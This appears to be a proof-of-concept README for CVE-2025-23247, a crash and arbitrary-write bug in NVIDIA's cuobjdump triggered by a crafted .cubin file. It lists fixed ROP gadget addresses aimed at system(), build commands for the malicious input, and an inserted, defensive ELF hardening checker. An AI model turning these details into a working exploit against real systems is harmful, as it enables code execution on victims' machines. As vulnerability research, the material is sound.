# CVE-2025-23247
Epic collab with @reubensammut :) as always :)

WIP for CVE-2025-23247. At the moment this is just a crash PoC which shows we control the buffer and offset, so we have an arbitrary address write (aaw).

Bug from https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151

```
checksec ./cuobjdump
[*] '/home/vlad/cuobjdump'
    Arch:   amd64-64-little
    RELRO:  Partial RELRO
    Stack:  No canary found
    NX:     NX enabled
    PIE:    No PIE (0x400000)
```

Anyway, there is no PIE, so the addresses are fixed:

```c
uint64_t system_plt = 0x401d90;
uint64_t pop_rdi_ret = 0x402d1b;
uint64_t ret_gadget = 0x402d1c; // Just a ret
```

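
The checksec fields shown above can be read straight from the ELF headers, which is useful when auditing whether shipped tools are built with PIE, NX, full RELRO and stack canaries. The following is an added example, not part of the original PoC repository; `hardening` and `sample_elf` are hypothetical names, the sample images are constructed, and the canary check is only a string heuristic.

```python
import struct

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 24, 30, 0x6FFFFFFB

def hardening(data: bytes) -> dict:
    """checksec-style properties of a little-endian ELF64 image (canary is a string heuristic)."""
    if data[:6] != b"\x7fELF\x02\x01":
        raise ValueError("not a little-endian ELF64 file")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = relro = bind_now = False
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        p_type, p_flags, p_offset = struct.unpack_from("<IIQ", data, base)
        (p_filesz,) = struct.unpack_from("<Q", data, base + 32)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & 1)  # PF_X clear: stack is not executable
        elif p_type == PT_GNU_RELRO:
            relro = True
        elif p_type == PT_DYNAMIC:
            end = min(p_offset + p_filesz, len(data) - 15)
            for off in range(p_offset, end, 16):  # Elf64_Dyn entries
                tag, val = struct.unpack_from("<qQ", data, off)
                if tag == 0:  # DT_NULL terminates the table
                    break
                bind_now |= (tag == DT_BIND_NOW or (tag == DT_FLAGS and (val & 0x8) != 0)
                             or (tag == DT_FLAGS_1 and (val & 0x1) != 0))
    return {
        "pie": e_type == 3,  # ET_DYN; ET_EXEC (2) loads at a fixed base
        "nx": nx,
        "relro": "full" if relro and bind_now else "partial" if relro else "none",
        "canary": b"__stack_chk_fail" in data,
    }

def sample_elf(e_type, stack_flags, relro, dyn_tags=()):
    """Constructed header-only ELF64 image, for demonstration only."""
    dyn = b"".join(struct.pack("<qQ", t, v) for t, v in dyn_tags) + bytes(16)
    segs = [(PT_GNU_STACK, stack_flags, 0, 0), (PT_DYNAMIC, 6, 232, len(dyn)),
            (PT_GNU_RELRO if relro else 0, 4, 0, 0)]
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", b"\x7fELF\x02\x01\x01", e_type, 62, 1,
                       0, 64, 0, 0, 64, 56, len(segs), 0, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, f, o, 0, 0, n, n, 8) for t, f, o, n in segs)
    return ehdr + phdrs + dyn

# Same profile as the checksec output above: fixed base, NX, partial RELRO, no canary.
LIKE_PAGE = hardening(sample_elf(2, 6, True))
HARDENED = hardening(sample_elf(3, 6, True, [(DT_FLAGS, 0x8)]) + b"__stack_chk_fail\0")
```

To audit a real binary, pass `open(path, "rb").read()` to `hardening`; a result matching `LIKE_PAGE` means code addresses are predictable across runs.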
Crashpoint

```
gcc -o modify_simple modify_simple.c
vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin
Created modified_simple2.cubin with vulnerable .nv_debug_source section
Run: ./cuobjdump --dump-elf modified_simple2.cubin
```

And for the CUDA kernel:

```
nvcc -ptx simple.cu -o simple.ptx
nvcc -cubin simple.ptx -o simple.cubin --generate-line-info
```

or

```
nvcc -cubin simple.cu -o simple.cubin --generate-line-info
```

```
[4.0K] /data/pocs/8aae502ef489f69646a21af58f24fd46c7b8d058
├── [4.0K] modify_simple.c
├── [1.1K] README.md
└── [ 168] simple.cu

1 directory, 3 files
```